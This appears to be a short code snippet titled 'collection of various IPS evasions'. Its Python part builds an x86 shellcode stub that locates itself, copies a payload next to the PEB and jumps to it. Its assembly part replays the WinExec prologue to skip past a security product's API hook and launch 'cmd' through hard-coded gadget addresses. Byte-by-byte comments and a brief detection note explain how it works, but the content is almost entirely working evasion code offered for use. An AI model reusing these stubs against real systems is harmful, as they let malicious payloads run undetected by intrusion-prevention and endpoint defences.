Created Apr 18, 2010

What would you like to do?
collection of various IPS evasions
# Self-relocating stub that is prepended to `scode` (defined elsewhere in this
# file; `struct` must also be imported there).  What the bytes below do:
#   CALL $+5 / POP ESI    -> ESI = address of the POP, i.e. the stub locates itself
#   ADD ESI, 0x1b         -> skip the rest of the stub so ESI points at the payload
#   MOV ECX, len(scode)   -> byte count for the copy
#   MOV EDI, FS:[0x30]    -> PEB pointer on 32-bit Windows, used as the copy base
#   ADD EDI, offset       -> destination = PEB + offset
#   PUSH EDI / REP MOVSB / RETN -> copy the payload there and jump to it
# Detection note: the CALL $+5 / POP self-location, the FS:[0x30] read and the
# REP MOVSB copy are the observable building blocks of this stub.
offset = 0x1000 - len(scode) - 32  # destination relative to FS:[0x30]; presumably keeps the payload inside one 0x1000-byte page, with 32 bytes of slack -- confirm
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 (pushes the address of the next instruction)
tls_header += "\x5E" # POP ESI (ESI = address of this POP)
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b (0x1b = 27 = bytes from POP ESI through RETN, so ESI now points just past the stub; assumes scode is appended directly after it -- confirm)
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) (REP count, little-endian 32-bit)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] (PEB pointer)
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset (copy destination)
tls_header += "\x57" # PUSH EDI (destination becomes the RETN target)
tls_header += "\xFC" # CLD (forward direction for the string copy)
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] (copy ECX bytes of payload)
tls_header += "\xC3" # RETN (pops EDI -> jumps to the copied payload)
; Stack frame staged before re-entering WinExec past an entry hook (Intel syntax).
; Assumptions stated by the comments below: eax = &WinExec + 0x6, i.e. just past a
; 6-byte hook at the function entry, and the original prologue is
; push ebp / mov ebp,esp / sub esp,0x54, which is replayed here by hand.
; The two absolute addresses (0x00220000 and 0x1010303D in CSAUSER) are hard-coded,
; so this sequence is tied to the exact module build they were taken from.
pop ebx ; Real return address
push 0x00220000 ; Address of push ebp/call ebp after a call.
push ebx ; Final return to the real return address
push 0xbadc0de2 ; Junk to align stack for pop ebp
push [ebp+0x4] ; Pointer to 'cmd\0'
push 0x1010303D ; Address of pop ebp/ret(after a call) in CSAUSER
push ebp ; WinExec preamble, replayed because the hook overwrote it
mov ebp, esp
sub esp, 0x54 ; end WinExec preamble
jmp eax ; jmp past WinExec hook. (eax = &WinExec + 0x6)